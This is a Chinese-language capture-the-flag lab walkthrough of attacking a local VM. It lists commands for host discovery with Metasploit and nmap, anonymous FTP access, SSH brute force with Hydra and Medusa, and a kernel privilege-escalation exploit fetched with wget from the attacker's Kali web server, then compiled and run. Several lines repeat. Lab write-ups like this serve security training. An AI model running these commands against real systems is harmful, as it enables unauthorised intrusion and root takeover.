- 靶场搭建
- 将网络模式更改为net模式
- 将网络模式更改为net模式
- 信息搜集
- 使用msf探测存活主机
- msfconsole
- search arp_sweep
- use 0
- set rhosts 192.168.244.0/24
- set threads 10
- run
- 扫描目标主机开放端口
- nmap -p- -A 192.168.244.166
- nmap -p- -A 192.168.244.166
- 可以看到它开启了ftp服务,ssh服务,和http服务
- 根据ftp的版本,可以看到他有一个历史漏洞,但很遗憾,不怎么会用
- 继续查看,可以看到ftp开启了匿名登录
- 具体看一下这个匿名登录
- 记下来,继续搜集其它有用的信息
- ssh服务,根据ssh的版本去搜索它的历史漏洞,但是目前不知道ssh的用户名和密码,此漏洞无法利用
- 访问80端口,一张没有意义的图片
- 根据ftp的版本,可以看到他有一个历史漏洞,但很遗憾,不怎么会用
- 扫描一下它的目录
- dirsearch -r -e php,html,js,txt -u http://192.168.244.166:80/ -x 404
- 访问目录,没有什么有用的信息
- /robots.txt
- /secret
- /robots.txt
- 使用msf探测存活主机
- 漏洞利用
- 前面发现一个ftp匿名登录漏洞
- 尝试登录ftp,ftp 192.168.244.166,输入用户名:anonymous,密码任意,成功登录
- 通过ftp命令,我们可以看到他只有一个文件,我们将文件下载下来
- pacp格式的文件是数据报存储格式
- 使用wireshark打开,找到两个特殊的数据报
- 那个txt文件访问不了
- 这个东西sup3rs3cr3tdirlol,我是想破脑袋都没有想到他是一个目录
- 将roflmao下载下来,打开查看
- 或者使用strings命令查看这个32位可执行文件
- 继续访问0x0856BF
- 两个文件,有一个指定了是密码,那么另一个肯定是用户名,不过密码文件中的内容有点怪异,感觉像是ftp的笑脸漏洞
- 将用户名和密码导出来
- 利用九头蛇进行爆破hydra -L user.txt -P pass.txt 192.168.244.166 ssh,爆破失败
- 增加密码
- 继续爆破,还是失败,爆破失败的原因可能是因为kali没有开启ssh密码验证登录,使用ssh qwe@192.168.244.166尝试登录,开启密码验证
- 再次尝试(真是应了那句话,你叫什么名字?不知道(布吉岛))
- 也可以用美杜莎爆破
- medusa -U user.txt -P pass.txt -h 192.168.244.166 -M ssh
- medusa -U user.txt -P pass.txt -h 192.168.244.166 -M ssh
- 使用ssh远程连接,用户权限为普通用户
- 提权,目标的操作系统版本是Linux Ubuntu 3.13.0-32
- 检索与系统版本相匹配的提权exp
- 用locate linux/local/40847.cpp来查看他的绝对路径,将它复制到桌面
- 临时开启kali的http服务python3 -m http.server 8081
- ssh连接,进入终端python -c 'import pty; pty.spawn("/bin/bash")'
- 从kali上下载exp,wget http://192.168.244.128:8081/37292.c
- 编译37292.c文件gcc 37292.c -o qwe
- 执行qwe文件./qwe
- 执行qwe文件./qwe
- 输入python -c 'import pty; pty.spawn("/bin/bash")'获取终端,可以看到是root权限,去root目录下查看flag
- 检索与系统版本相匹配的提权exp
扫一扫
08-11
547
547
10-28
10-02
1763
1763
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
